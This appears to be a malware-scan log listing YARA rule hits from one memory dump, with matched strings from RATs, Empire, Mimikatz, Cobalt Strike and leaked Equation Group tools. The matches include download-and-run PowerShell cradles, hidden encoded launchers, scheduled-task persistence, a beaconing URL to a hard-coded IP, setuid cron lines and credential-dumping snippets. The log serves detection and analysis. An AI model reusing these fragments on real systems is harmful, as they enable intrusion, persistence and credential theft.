00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth	0x5b58e:$x1: Nuclear Explosion.g.resources 0x5b60f:$x4: 5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41 0x5b656:$x5: \RevengeRAT\ 0x5b678:$x6: Revenge-RAT client has been successfully installed. 0x5b6c0:$x7: Nuclear Explosion.exe
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Empire_Invoke_Mimikatz	Empire - a pure PowerShell post-exploitation agent - file Invoke-Mimikatz.ps1	Florian Roth	0x10bf3b:$s2: [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false) 0x10bfc5:$s3: Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Mimipenguin_SH	Detects Mimipenguin Password Extractor - Linux	Florian Roth	0xab1bc:$s1: $(echo $thishash \| cut -d'$' -f 3) 0xab248:$s3: MimiPenguin Results:
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	HKTL_PowerKatz_Feb19_1	Detetcs a tool used in the Australian Parliament House network compromise	Florian Roth	0xaa8e:$x1: Powerkatz32 0xaabc:$x2: Powerkatz64 0xaae1:$s1: GetData: not found taskName 0xab1f:$s2: GetRes Ex:
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	HKTL_Unknown_Feb19_1	Detetcs a tool used in the Australian Parliament House network compromise	Florian Roth	0xad65:$x1: not a valid timeout format! 0xada3:$x2: host can not be empty! 0xaddc:$x3: not a valid port format! 0xae17:$x4: {0} - {1} TTL={2} time={3} 0xae54:$x5: ping count is not a correct format! 0xae9a:$s1: The result is too large,program store to '{0}'.Please download it manully.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	POSHSPY_Malware	Detects	Florian Roth	0x68898:$x1: function sWP($cN, $pN, $aK, $aI) 0x688d6:$x2: $aeK = [byte[]] (0x69, 0x87, 0x0b, 0xf2 0x68912:$x3: (('variant', 'excretions', 'accumulators', 'winslow', 'whistleable', 'len', 0x689a4:$x5: $exeRes = exePldRoutine 0x689cb:$x6: ZgB1AG4AYwB0AGkAbwBuACAAcAB1AHIAZgBDAHIA
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Pirpi_1609_A	Detects Pirpi Backdoor - and other malware (generic rule)	Florian Roth	0xd20b8:$x1: expand.exe1.gif 0xd20e5:$c1: expand.exe 0xd210d:$c2: ctf.exe 0xd218d:$s3: ctfnon.exe 0xd21b5:$s4: flv%d.exe 0xd221d:$s6: 12811[%d].gif 0xd2293:$s9: %d-%4.4d%d 0xd22bc:$s10: http://%s/%5.5d.html
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Pirpi_1609_B	Detects Pirpi Backdoor	Florian Roth	0xd25d9:$s1: tconn <ip> <port> //set temp connect value, and disconnect. 0xd2632:$s2: E* ListenCheckSsl SslRecv fd(%d) Error ret:%d %d 0xd2680:$s3: %s %s L* ListenCheckSsl fd(%d) SslV(-%d-) 0xd26c7:$s4: S:%d.%d-%d.%d V(%d.%d) Listen On %d Ok. 0xd270c:$s5: E* ListenCheckSsl fd(%d) SslAccept Err %d 0xd2753:$s6: %s-%s N110 Ssl Connect Ok(%s:%d). 0xd2792:$s7: %s-%s N110 Basic Connect Ok(%s:%d). 0xd25d9:$s8: tconn <ip> <port> 0xd27d3:$s8: tconn <ip> <port>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	FourElementSword_Config_File	Detects FourElementSword Malware	Florian Roth	0xf497d:$s0: 01,,hccutils.dll,2 0xf49ad:$s1: RegisterDlls=OurDll 0xf49de:$s2: [OurDll] 0xf4a04:$s3: [DefaultInstall]
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	FourElementSword_ElevateDLL_2	Detects FourElementSword Malware	Florian Roth	0xf4cc7:$s1: Elevate.dll 0xf560b:$s1: Elevate.dll 0xf5e0a:$s1: Elevate.dll 0xf5634:$s2: GetSomeF 0xf565a:$s3: GetNativeSystemInfo
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Win_PrivEsc_gp3finder_v4_0	Detects a tool that can be used for privilege escalation - file gp3finder_v4.0.exe	Florian Roth	0xede39:$x1: Check for and attempt to decrypt passwords on share 0xede81:$x2: Failed to auto get and decrypt passwords. {0}s/ 0xedece:$x3: GPPPFinder - Group Policy Preference Password Finder
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Win_PrivEsc_folderperm	Detects a tool that can be used for privilege escalation - file folderperm.ps1	Florian Roth	0xee15a:$x1: # powershell.exe -executionpolicy bypass -file folderperm.ps1
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PoisonIvy_Sample_6	Detects PoisonIvy RAT sample set	Florian Roth	0x166621:$x1: 124.133.252.150 0x16664e:$x3: http://124.133.254.171/up/up.asp?id=%08x&pcname=%s 0x16673c:$z4: \tappmgmts.dll 0x166769:$z5: \appmgmts.dll 0x1668af:$s4: CONNECT %s:%i HTTP/1.0 0x1668e3:$s5: start read histry key 0x166970:$s7: [password]%s 0x16699a:$s8: Daemon.dll 0x1669c2:$s9: [username]%s 0x1669ed:$s10: advpack 0x166a13:$s11: %s%2.2X 0x166a39:$s12: advAPI32
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x5df7b:$loader_export: ReflectiveLoader 0x5e038:$loader_export: ReflectiveLoader 0x5e6ed:$loader_export: ReflectiveLoader 0x5e7d6:$loader_export: ReflectiveLoader 0x65187:$loader_export: ReflectiveLoader 0x6527e:$loader_export: ReflectiveLoader 0x661f3:$loader_export: ReflectiveLoader 0x66ab9:$loader_export: ReflectiveLoader 0x66f45:$loader_export: ReflectiveLoader 0xd8603:$exportname: beacon.dll
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Metasploit_Loader_RSMudge	Detects a Metasploit Loader by RSMudge - file loader.exe	Florian Roth	0xf2a7d:$s1: Could not resolve target 0xdebcf:$s2: Could not connect to target 0xf2ab3:$s2: Could not connect to target 0xf2aec:$s3: %s [host] [port] 0xf2b1a:$s4: ws2_32.dll is out of date. 0xf2b52:$s5: read a strange or incomplete length value
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Armitage_OSX	Detects Armitage component	Florian Roth	0x433da:$x1: resources/covertvpn-injector.exe 0x43419:$s10: resources/browserpivot.x64.dll 0x43456:$s17: resources/msfrpcd_new.bat
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	OilRig_Malware_Campaign_Gen2	Detects malware from OilRig Campaign	Florian Roth	0xcd19b:$s2: $fdn=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(' 0xcd209:$s3: &{$rn = Get-Random; $id = 'TR 0xcd244:$s4: ') -replace '__',('DNS'+$id) \| 0xcd282:$s5: \upd.vbs 0xcd2a8:$s6: schtasks /create /F /sc minute /mo 0xcd2e9:$s7: ') -replace '__',('HTP'+$id) \| 0xcd326:$s8: &{$rn = Get-Random -minimum 1 -maximum 10000; $id = 'AZ 0xcd37b:$s9: http://www.israirairlines.com/?mode=page&page=14635&lang=eng<
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	APT_APT34_PS_Malware_Apr19_1	Detects APT34 PowerShell malware	Florian Roth	0x6b7c:$x1: = get-wmiobject Win32_ComputerSystemProduct \| Select-Object -ExpandProperty UUID 0x6ef6:$x1: = get-wmiobject Win32_ComputerSystemProduct \| Select-Object -ExpandProperty UUID 0x6c17:$s1: Start-Sleep -s 1; 0x6c46:$s2: Start-Sleep -m 100;
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	APT_APT34_PS_Malware_Apr19_3	Detects APT34 PowerShell malware	Florian Roth	0x7297:$x1: Powershell.exe -exec bypass -file ${global:$address1} 0x72dc:$x2: schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn 0x7389:$x5: ::FromBase64String([string]${global:$http_ag})) 0x7411:$x7: \UpdateTask.vbs 0x743e:$x8: hUpdater.ps1
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Silence_malware_2	Detects malware sample mentioned in the Silence report on Securelist	Florian Roth	0x4b943:$s1: My Sample Service: ServiceMain: SetServiceStatus returned error 0x4b9a1:$s2: \mss.exe 0x4b9c8:$s3: \out.dat 0x4b9ef:$s4: \mss.txt 0x4ba15:$s5: Default monitor
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Invoke_Mimikatz	Detects Invoke-Mimikatz String	Florian Roth	0x68167:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm 0x4b146:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp 0x681ee:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	NTLM_Dump_Output	NTML Hash Dump output file - John/LC format	Florian Roth	0xedb74:$s0: 500:AAD3B435B51404EEAAD3B435B51404EE: 0xedbae:$s1: 500:aad3b435b51404eeaad3b435b51404ee:
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	FIN7_Backdoor_Aug17	Detects Word Dropper from Proofpoint FIN7 Report	Florian Roth	0x61b1c:$s1: /?page=wait 0x61b45:$a1: autoit3.exe 0x61b6e:$a2: dumpcap.exe 0x61b97:$a3: tshark.exe 0x61bbf:$a4: prl_cc.exe 0x61be7:$v1: vmware 0x61c41:$v3: VMWVMCIHOSTDEV 0x61c6d:$c1: apowershell 0x61c96:$c2: wpowershell 0x61cbf:$c3: get_passwords 0x61cea:$c4: kill_process 0x61d14:$c5: get_screen
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Invoke_WMIExec_Gen_1	Detects Invoke-WmiExec or Invoke-SmbExec	Florian Roth	0x73b91:$x1: Invoke-WMIExec 0x73bb5:$x2: $target_count = [System.math]::Pow(2,(($target_address.GetAddressBytes().Length * 8) - $subnet_mask_split)) 0x73cc8:$s3: $target_address_list = [System.Net.Dns]::GetHostEntry($target_long).AddressList 0x73d35:$x4: Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WMImplant	Auto-generated rule - file WMImplant.ps1	Florian Roth	0xabab7:$x1: Invoke-ProcessPunisher -Creds $RemoteCredential 0xabc28:$x6: Invoke-WMImplant
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Invoke_PSImage	Detects a command to execute PowerShell from String	Florian Roth	0x44682:$: IEX([System.Text.Encoding]::ASCII.GetString( 0x446c6:$: System.Drawing.Bitmap((a Net.WebClient).OpenRead(
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	HKTL_Dsniff	Detects Dsniff hack tool	Florian Roth	0x92e3:$x1: .account.\|.acct.\|.domain.\|.login.\|.member.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	APT_Project_Sauron_arping_module	Detects strings from arping module - Project Sauron report by Kaspersky	Florian Roth	0xe65b8:$s1: Resolve hosts that answer 0xe65e1:$s2: Print only replying Ips 0xe6608:$s3: Do not display MAC addresses
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	APT_Project_Sauron_kblogi_module	Detects strings from kblogi module - Project Sauron report by Kaspersky	Florian Roth	0xe6a92:$x1: Inject using process name or pid. Default 0xe6acb:$s2: Convert mode: Read log from file and convert to text 0xe6b0f:$s3: Maximum running time in seconds
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	APT_Project_Sauron_basex_module	Detects strings from basex module - Project Sauron report by Kaspersky	Florian Roth	0xe681f:$x1: 64, 64url, 32, 32url or 16. 0xe684a:$s2: Force decoding when input is invalid/corrupt 0xe6886:$s3: This cruft 0xe6df7:$s3: This cruft 0xe6e91:$s3: This cruft 0xe703f:$s3: This cruft
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	APT_Project_Sauron_dext_module	Detects strings from dext module - Project Sauron report by Kaspersky	Florian Roth	0xe6d2c:$x1: Assemble rows of DNS names back to a single string of data 0xe6d76:$x2: removes checks of DNS names and lengths (during split) 0xe6dbc:$x3: Randomize data lengths (length/2 to length) 0xe6886:$x4: This cruft 0xe6df7:$x4: This cruft 0xe6e91:$x4: This cruft 0xe703f:$x4: This cruft
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	FVEY_ShadowBrokers_Jan17_Screen_Strings	Detects strings derived from the ShadowBroker\'s leak of Windows tools/exploits	Florian Roth	0x8617b:$x3: PeddleCheap 0x8f6e8:$x3: PeddleCheap 0xc0ffc:$c4: EventLogEdit 0xc1074:$c4: EventLogEdit 0x83640:$d4: Mcl_NtMemory
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	GRIZZLY_STEPPE_Malware_2	Auto-generated rule	Florian Roth	0xc2572:$x1: GoogleCrashReport.dll 0xc25a5:$s1: CrashErrors 0xc25ce:$s2: CrashSend 0xc25f5:$s3: CrashAddData 0xc261f:$s4: CrashCleanup 0xc2649:$s5: CrashInit
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Invoke_OSiRis	Osiris Device Guard Bypass - file Invoke-OSiRis.ps1	Florian Roth	0xab444:$x1: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create -Arg $ObfusK -Computer $Target 0xab2f8:$x2: Invoke-OSiRis 0xab4d0:$x2: Invoke-OSiRis 0xab4f2:$x3: -Arg@{Name=$VarName;VariableValue=$OSiRis;UserName=$env:Username} 0xab551:$x4: Device Guard Bypass Command Execution 0xab594:$x5: -Put Payload in Win32_OSRecoveryConfiguration DebugFilePath 0xab444:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create 0xab5ed:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Sofacy_Fybis_ELF_Backdoor_Gen1	Detects Sofacy Fysbis Linux Backdoor	Florian Roth	0xf7f3e:$x1: Your command not writed to pipe 0xf7f7b:$x2: Terminal don`t started for executing command 0xf8001:$s1: WantedBy=multi-user.target' >> /usr/lib/systemd/system/ 0xf8056:$s2: Success execute command or long for waiting executing your command 0xf813e:$s4: rm -f /usr/lib/systemd/system/ 0xf817a:$s5: ExecStart= 0xf81a2:$s6: <table><caption><font size=4 color=red>TABLE EXECUTE FILES</font></caption>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Greenbug_Malware_4	Detects ISMDoor Backdoor	Florian Roth	0xb9658:$s4: taskkill /im winit.exe /f 0xb968f:$s5: invoke-psuacme 0xb971c:$s8: Invoke-bypassuac
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Greenbug_Malware_5	Auto-generated rule	Florian Roth	0xb9acb:$x2: cmd /a /c net user administrator /domain >> 0xb9b68:$o1: ========================== (Net User) ==========================
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Winnti_NlaifSvc	Winnti sample - file NlaifSvc.dll	Florian Roth	0xb8dce:$x1: cracked by ximo 0xb8df2:$s1: Yqrfpk 0xb8e16:$s2: IVVTOC
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Empire_Get_SecurityPackages	Detects Empire component - file Get-SecurityPackages.ps1	Florian Roth	0xc6180:$s1: $null = $EnumBuilder.DefineLiteral('LOGON', 0x2000) 0xc61d1:$s2: $EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Empire_Invoke_PowerDump	Detects Empire component - file Invoke-PowerDump.ps1	Florian Roth	0xc648c:$x16: $enc = Get-PostHashdumpScript 0xc64c8:$x19: $lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword; 0xc652c:$x20: $rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Empire_Invoke_ShellcodeMSIL	Detects Empire component - file Invoke-ShellcodeMSIL.ps1	Florian Roth	0xc67f0:$s1: $FinalShellcode.Length 0xc6824:$s2: @(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3) 0xc686d:$s3: @(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57, 0xc68b5:$s4: $TargetMethod.Invoke($null, @(0x11112222)) \| Out-Null
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Empire_Invoke_SmbScanner	Detects Empire component - file Invoke-SmbScanner.ps1	Florian Roth	0xc715b:$s1: $up = Test-Connection -count 1 -Quiet -ComputerName $Computer 0xc71b7:$s2: $out \| add-member Noteproperty 'Password' $Password
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Empire_Invoke_EgressCheck	Detects Empire component - file Invoke-EgressCheck.ps1	Florian Roth	0xc7b3b:$s1: egress -ip $ip -port $c -delay $delay -protocol $protocol
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Empire_Invoke_PostExfil	Detects Empire component - file Invoke-PostExfil.ps1	Florian Roth	0xc86bf:$s1: # upload to a specified exfil URI 0xc86fe:$s2: Server path to exfil to.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Empire_Invoke_SMBAutoBrute	Detects Empire component - file Invoke-SMBAutoBrute.ps1	Florian Roth	0xc897b:$s1: [*] PDC: LAB-2008-DC1.lab.com 0xc89b6:$s2: $attempts = Get-UserBadPwdCount $userid $dcs
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Empire_Get_Keystrokes	Detects Empire component - file Get-Keystrokes.ps1	Florian Roth	0xc8c3e:$s1: $RightMouse = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Empire_Invoke_DllInjection	Detects Empire component - file Invoke-DllInjection.ps1	Florian Roth	0xc8f21:$s1: -Dll evil.dll
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Empire_KeePassConfig	Detects Empire component - file KeePassConfig.ps1	Florian Roth	0xc9188:$s1: $UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force \| Select-Object -ExpandProperty FullName) )
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Empire_PowerUp_Gen	Detects Empire component - from files PowerUp.ps1, PowerUp.ps1	Florian Roth	0xc97bf:$s1: $Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath 0xc9822:$s2: $Result = sc.exe pause $($TargetService.Name)
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Empire_KeePassConfig_Gen	Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1	Florian Roth	0xca160:$s1: $KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Empire_Invoke_Portscan_Gen	Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1	Florian Roth	0xca41c:$s1: Test-Port -h $h -p $Port -timeout $Timeout 0xca464:$s2: 1 {$nHosts=10; $Threads = 32; $Timeout = 5000 }
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Empire_Invoke_Gen	Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1	Florian Roth	0xca74c:$s1: $Shellcode1 += 0x48 0xca77d:$s2: $PEHandle = [IntPtr]::Zero
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	TeleBots_IntercepterNG	Detects TeleBots malware - IntercepterNG	Florian Roth	0xc2b6d:$s2: Target%d found: %s - [%.2X-%.2X-%.2X-%.2X-%.2X-%.2X] 0xc2bbf:$s3: 3: passwords + files, no arp poison 0xc2c00:$s4: IRC Joining Keyed Channel intercepted 0xc2c43:$s5: -tX - set target ip 0xc2c74:$s6: w - save session to .pcap dump 0xc2cb0:$s7: example: %s 1 1 -gw 192.168.1.1 -t1 192.168.1.3 -t2 192.168.1.5 0xc2d0d:$s8: ORACLE8 DES Authorization intercepted
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WiltedTulip_powershell	Detects powershell script used in Operation Wilted Tulip	Florian Roth	0x647ad:$x1: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WiltedTulip_Windows_UM_Task	Detects a Windows scheduled task as used in Operation Wilted Tulip	Florian Roth	0x6554e:$c2: svchost64.swp,checkUpdate
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WiltedTulip_WindowsTask	Detects hack tool used in Operation Wilted Tulip - Windows Tasks	Florian Roth	0x65802:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x66d03:$x2: %d is an x86 process (can't inject x64 content) 0x763aa:$x2: %d is an x86 process (can't inject x64 content) 0xd8374:$x2: %d is an x86 process (can't inject x64 content) 0x4f12e:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x66d50:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x762f2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0xd8559:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x66db7:$x4: Failed to impersonate token from %d (%u) 0xd862b:$x4: Failed to impersonate token from %d (%u) 0x4f093:$x5: Failed to impersonate logged on user %d (%u) 0x66dfd:$x5: Failed to impersonate logged on user %d (%u) 0xd850f:$x5: Failed to impersonate logged on user %d (%u) 0x4f239:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x66e47:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x76462:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Impacket_Tools_Generic_1	Compiled Impacket Tools	Florian Roth	0xa7f35:$s1: bpywintypes27.dll 0xa7f64:$s2: hZFtPC 0x2f2d2:$s3: impacket 0x2f3fe:$s3: impacket 0x2f4ff:$s3: impacket 0x2f53a:$s3: impacket 0x2f56f:$s3: impacket 0x2f5a4:$s3: impacket 0x2f5d2:$s3: impacket 0x2f5fd:$s3: impacket 0x2f629:$s3: impacket 0x61f85:$s3: impacket 0x61fb0:$s3: impacket 0x61fdc:$s3: impacket 0xa3efe:$s3: impacket 0xa403d:$s3: impacket 0xa4174:$s3: impacket 0xa43de:$s3: impacket 0xa4521:$s3: impacket 0xa4653:$s3: impacket 0xa489e:$s3: impacket
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Invoke_mimikittenz	Detects Mimikittenz - file Invoke-mimikittenz.ps1	Florian Roth	0xe7891:$x1: [mimikittenz.MemProcInspector] 0xe78c4:$s1: PROCESS_ALL_ACCESS = PROCESS_TERMINATE \| PROCESS_CREATE_THREAD \| PROCESS_SET_SESSIONID \| PROCESS_VM_OPERATION \| 0xe7951:$s2: IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ \| MInterop.PROCESS_QUERY_INFORMATION, false, process.Id); 0xe79ed:$s3: &email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	ONHAT_Proxy_Hacktool	Detects ONHAT Proxy - Htran like SOCKS hack tool used by Chinese APT groups	Florian Roth	0xf0709:$s1: INVALID PARAMETERS. TYPE ONHAT.EXE -h FOR HELP INFORMATION. 0xf0762:$s2: [ONHAT] LISTENS (S, %d.%d.%d.%d, %d) ERROR. 0xf07ab:$s3: [ONHAT] CONNECTS (T, %d.%d.%d.%d, %d.%d.%d.%d, %d) ERROR.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup_elgingamble	Equation Group hack tool leaked by ShadowBrokers- file elgingamble	Florian Roth	0x9bf26:$x1: * * * * * root chown root %s; chmod 4755 %s; %s 0x9bf73:$x2: [-] kernel not vulnerable 0x9f899:$x2: [-] kernel not vulnerable 0x9fc06:$x2: [-] kernel not vulnerable 0x9fef2:$x2: [-] kernel not vulnerable 0x9bfaa:$x3: [-] failed to spawn shell: %s 0x9bfe5:$x4: -s shell Use shell instead of %s
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup_cmsd	Equation Group hack tool leaked by ShadowBrokers- file cmsd	Florian Roth	0x9c244:$x1: usage: %s address [-t][-s\|-c command] [-p port] [-v 5\|6\|7] 0x9c29c:$x2: error: not vulnerable 0x9c2cf:$s1: port=%d connected! 0x9c300:$s2: xxx.XXXXXX
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup_ebbshave	Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5	Florian Roth	0x9c591:$s1: executing ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s 0x9c5e8:$s2: ./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772 0x9c63f:$s3: version 1 - Start with option #18 first, if it fails then try this option 0x9c6a6:$s4: %s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup_eggbasket	Equation Group hack tool leaked by ShadowBrokers- file eggbasket	Florian Roth	0x9c978:$x1: # Building Shellcode into exploit. 0x9ca35:$x3: # STARTING EXHAUSTIVE ATTACK AGAINST
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup_sambal	Equation Group hack tool leaked by ShadowBrokers- file sambal	Florian Roth	0x9cfe5:$s1: + Bruteforce mode. 0x9d015:$s3: + Host is not running samba! 0x9d04f:$s4: + connecting back to: [%d.%d.%d.%d:45295] 0x9d096:$s5: + Exploit failed, try -b to bruteforce. 0x9d0db:$s7: Usage: %s [-bBcCdfprsStv] [host]
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup_cmsex	Equation Group hack tool leaked by ShadowBrokers- file cmsex	Florian Roth	0x9dad1:$x1: Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> \| -t <port>) 0x9db45:$x2: -i target ip address / hostname 0x9db83:$x3: Note: Choosing the correct target type is a bit of guesswork. 0x9dbde:$x4: Solaris rpc.cmsd remote root exploit 0x9dc20:$x5: If one choice fails, you may want to try another.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup_DUL	Equation Group hack tool leaked by ShadowBrokers- file DUL	Florian Roth	0x9e190:$x1: ?Usage: %s <shellcode> <output_file> 0x9e1d2:$x2: Here is the decoder+(encoded-decoder)+payload
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup_slugger2	Equation Group hack tool leaked by ShadowBrokers- file slugger2	Florian Roth	0x9e482:$x1: usage: %s hostip port cmd [printer_name] 0x9e4c8:$x2: command must be less than 61 chars 0x9e508:$s1: __rw_read_waiting 0x9def4:$s2: completed.1 0x9e537:$s2: completed.1 0x9e560:$s3: __mutexkind 0x9e589:$s4: __rw_pshared
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup_jackpop	Equation Group hack tool leaked by ShadowBrokers- file jackpop	Florian Roth	0x9ec44:$x1: %x:%d --> %x:%d %d bytes 0x9ec7b:$s1: client: can't bind to local address, are you root? 0x9eccb:$s2: Unable to register port 0x9ed00:$s3: Could not resolve destination 0x9ed3b:$s4: raw troubles
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup_epoxyresin_v1_0_0	Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1	Florian Roth	0x9bf73:$x1: [-] kernel not vulnerable 0x9f899:$x1: [-] kernel not vulnerable 0x9fc06:$x1: [-] kernel not vulnerable 0x9fef2:$x1: [-] kernel not vulnerable 0x9f8d0:$s1: .tmp.%d.XXXXXX 0x9f8fc:$s2: [-] couldn't create temp file 0x9f937:$s3: /boot/System.map-%s
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup_estesfox	Equation Group hack tool leaked by ShadowBrokers- file estesfox	Florian Roth	0xa108c:$x1: chown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cron
